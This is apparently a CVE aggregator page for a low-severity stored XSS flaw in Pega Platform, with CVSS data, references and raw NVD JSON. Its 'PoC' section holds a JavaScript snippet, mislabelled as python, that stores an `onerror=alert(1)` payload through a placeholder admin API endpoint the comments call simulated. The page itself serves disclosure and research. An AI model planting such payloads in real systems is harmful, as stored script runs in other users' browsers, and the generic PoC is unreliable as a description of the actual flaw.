CVE-2025-62184

Description

Pega Platform versions 8.1.0 through 25.1.0 are affected by a Stored Cross-site Scripting vulnerability in a user interface component. Requires an administrative user and given extensive access rights, impact to Confidentiality is low and Integrity is none.

CVSS Details

CVSS Score

3.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:pega:pega_platform:*:*:*:*:*:*:*:* - VULNERABLE

Pega Platform 8.1.0 - 25.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Example Stored XSS Payload for Pega Platform
// Target: Vulnerable UI Component in versions 8.1.0 to 25.1.0
// Requirements: Administrator privileges

const maliciousPayload = '<img src=x onerror=alert(1)>';

// Simulating an API call to update a vulnerable component
// In a real scenario, the endpoint would be specific to the Pega instance configuration
fetch('/prweb/api/v1/save_component', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <Admin_Token>'
  },
  body: JSON.stringify({
    "componentId": "vulnerable_ui_element",
    "content": maliciousPayload
  })
}).then(response => {
  if(response.ok) console.log('Payload stored successfully');
});

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62184
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62184
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62184/
[4] VulDB https://vuldb.com/cve/CVE-2025-62184
[5] https://support.pega.com/support-doc/pega-security-advisory-o25-vulnerability-remediation-note

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62184", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:44.423", "lastModified": "2026-04-03T12:49:16.167", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pega Platform versions 8.1.0 through 25.1.0 are affected by a Stored Cross-site Scripting vulnerability in a user interface component. Requires an administrative user and given extensive access rights, impact to Confidentiality is low and Integrity is none."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pega:pega_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.1", "versionEndIncluding": "25.1.0", "matchCriteriaId": "C5AF856D-F80C-4AA3-A569-2DF0DA5E4192"}]}]}], "references": [{"url": "https://support.pega.com/support-doc/pega-security-advisory-o25-vulnerability-remediation-note", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}